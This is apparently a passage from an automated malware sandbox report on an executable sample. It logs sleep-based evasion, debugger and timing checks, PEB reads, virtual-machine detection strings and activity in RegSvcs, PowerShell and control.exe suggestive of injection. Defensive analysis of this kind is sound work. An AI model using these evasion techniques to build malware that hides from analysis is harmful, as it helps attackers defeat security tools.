Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: 820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: 26B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: 7B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: 76C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\z2______________________________.exe	Memory allocated: 7B50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Source: C:\Users\user\Desktop\z2______________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4337	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5012	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6040	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 849	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 1494	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Window / User API: threadDelayed 8478	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_6-13833

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\control.exe	API coverage: 1.8 %

Source: C:\Users\user\Desktop\z2______________________________.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7232	Thread sleep count: 6040 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7232	Thread sleep time: -12080000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7232	Thread sleep count: 3888 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7232	Thread sleep time: -7776000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 8040	Thread sleep count: 1494 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 8040	Thread sleep time: -2988000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 8040	Thread sleep count: 8478 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 8040	Thread sleep time: -16956000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\z2______________________________.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000002.4104131226.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.4103472130.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000006.00000002.4103472130.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000006.00000002.4104131226.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000006.00000002.4099296123.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000006.00000002.4101465452.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000002.4104221801.000000000997A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000006.00000000.1667913063.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000006.00000002.4103472130.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000006.00000003.3107844598.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1672845472.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4103472130.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107844598.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3429507996.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000006.00000002.4104221801.000000000997A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000006.00000000.1667913063.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4101465452.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000006.00000000.1672845472.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000006.00000002.4099296123.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000006.00000002.4099296123.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\z2______________________________.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_00409AA0 rdtsc

5_2_00409AA0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_0040ACE0 LdrLoadDll,

5_2_0040ACE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A197 mov eax, dword ptr fs:[00000030h]	5_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A197 mov eax, dword ptr fs:[00000030h]	5_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A197 mov eax, dword ptr fs:[00000030h]	5_2_0198A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D0185 mov eax, dword ptr fs:[00000030h]	5_2_019D0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A34180 mov eax, dword ptr fs:[00000030h]	5_2_01A34180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A34180 mov eax, dword ptr fs:[00000030h]	5_2_01A34180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4C188 mov eax, dword ptr fs:[00000030h]	5_2_01A4C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4C188 mov eax, dword ptr fs:[00000030h]	5_2_01A4C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1019F mov eax, dword ptr fs:[00000030h]	5_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1019F mov eax, dword ptr fs:[00000030h]	5_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1019F mov eax, dword ptr fs:[00000030h]	5_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A1019F mov eax, dword ptr fs:[00000030h]	5_2_01A1019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A661E5 mov eax, dword ptr fs:[00000030h]	5_2_01A661E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C01F8 mov eax, dword ptr fs:[00000030h]	5_2_019C01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A561C3 mov eax, dword ptr fs:[00000030h]	5_2_01A561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A561C3 mov eax, dword ptr fs:[00000030h]	5_2_01A561C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E1D0 mov ecx, dword ptr fs:[00000030h]	5_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A0E1D0 mov eax, dword ptr fs:[00000030h]	5_2_01A0E1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov eax, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E10E mov ecx, dword ptr fs:[00000030h]	5_2_01A3E10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A50115 mov eax, dword ptr fs:[00000030h]	5_2_01A50115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C0124 mov eax, dword ptr fs:[00000030h]	5_2_019C0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3A118 mov ecx, dword ptr fs:[00000030h]	5_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3A118 mov eax, dword ptr fs:[00000030h]	5_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3A118 mov eax, dword ptr fs:[00000030h]	5_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3A118 mov eax, dword ptr fs:[00000030h]	5_2_01A3A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64164 mov eax, dword ptr fs:[00000030h]	5_2_01A64164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A64164 mov eax, dword ptr fs:[00000030h]	5_2_01A64164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996154 mov eax, dword ptr fs:[00000030h]	5_2_01996154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01996154 mov eax, dword ptr fs:[00000030h]	5_2_01996154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198C156 mov eax, dword ptr fs:[00000030h]	5_2_0198C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A24144 mov eax, dword ptr fs:[00000030h]	5_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A24144 mov eax, dword ptr fs:[00000030h]	5_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A24144 mov ecx, dword ptr fs:[00000030h]	5_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A24144 mov eax, dword ptr fs:[00000030h]	5_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A24144 mov eax, dword ptr fs:[00000030h]	5_2_01A24144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A28158 mov eax, dword ptr fs:[00000030h]	5_2_01A28158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A280A8 mov eax, dword ptr fs:[00000030h]	5_2_01A280A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199208A mov eax, dword ptr fs:[00000030h]	5_2_0199208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A560B8 mov eax, dword ptr fs:[00000030h]	5_2_01A560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A560B8 mov ecx, dword ptr fs:[00000030h]	5_2_01A560B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019880A0 mov eax, dword ptr fs:[00000030h]	5_2_019880A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A160E0 mov eax, dword ptr fs:[00000030h]	5_2_01A160E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198C0F0 mov eax, dword ptr fs:[00000030h]	5_2_0198C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019D20F0 mov ecx, dword ptr fs:[00000030h]	5_2_019D20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019980E9 mov eax, dword ptr fs:[00000030h]	5_2_019980E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_0198A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A120DE mov eax, dword ptr fs:[00000030h]	5_2_01A120DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE016 mov eax, dword ptr fs:[00000030h]	5_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE016 mov eax, dword ptr fs:[00000030h]	5_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE016 mov eax, dword ptr fs:[00000030h]	5_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE016 mov eax, dword ptr fs:[00000030h]	5_2_019AE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A26030 mov eax, dword ptr fs:[00000030h]	5_2_01A26030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A14000 mov ecx, dword ptr fs:[00000030h]	5_2_01A14000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A32000 mov eax, dword ptr fs:[00000030h]	5_2_01A32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198A020 mov eax, dword ptr fs:[00000030h]	5_2_0198A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198C020 mov eax, dword ptr fs:[00000030h]	5_2_0198C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01992050 mov eax, dword ptr fs:[00000030h]	5_2_01992050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019BC073 mov eax, dword ptr fs:[00000030h]	5_2_019BC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A16050 mov eax, dword ptr fs:[00000030h]	5_2_01A16050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988397 mov eax, dword ptr fs:[00000030h]	5_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988397 mov eax, dword ptr fs:[00000030h]	5_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01988397 mov eax, dword ptr fs:[00000030h]	5_2_01988397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E388 mov eax, dword ptr fs:[00000030h]	5_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E388 mov eax, dword ptr fs:[00000030h]	5_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198E388 mov eax, dword ptr fs:[00000030h]	5_2_0198E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B438F mov eax, dword ptr fs:[00000030h]	5_2_019B438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B438F mov eax, dword ptr fs:[00000030h]	5_2_019B438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0199A3C0 mov eax, dword ptr fs:[00000030h]	5_2_0199A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019983C0 mov eax, dword ptr fs:[00000030h]	5_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019983C0 mov eax, dword ptr fs:[00000030h]	5_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019983C0 mov eax, dword ptr fs:[00000030h]	5_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019983C0 mov eax, dword ptr fs:[00000030h]	5_2_019983C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A163C0 mov eax, dword ptr fs:[00000030h]	5_2_01A163C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019C63FF mov eax, dword ptr fs:[00000030h]	5_2_019C63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A4C3CD mov eax, dword ptr fs:[00000030h]	5_2_01A4C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	5_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	5_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019AE3F0 mov eax, dword ptr fs:[00000030h]	5_2_019AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019A03E9 mov eax, dword ptr fs:[00000030h]	5_2_019A03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A343D4 mov eax, dword ptr fs:[00000030h]	5_2_01A343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A343D4 mov eax, dword ptr fs:[00000030h]	5_2_01A343D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	5_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	5_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E3DB mov ecx, dword ptr fs:[00000030h]	5_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A3E3DB mov eax, dword ptr fs:[00000030h]	5_2_01A3E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A68324 mov eax, dword ptr fs:[00000030h]	5_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A68324 mov ecx, dword ptr fs:[00000030h]	5_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A68324 mov eax, dword ptr fs:[00000030h]	5_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01A68324 mov eax, dword ptr fs:[00000030h]	5_2_01A68324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0198C310 mov ecx, dword ptr fs:[00000030h]	5_2_0198C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019B0310 mov ecx, dword ptr fs:[00000030h]	5_2_019B0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_019CA30B mov eax, dword ptr fs:[00000030h]	5_2_019CA30B
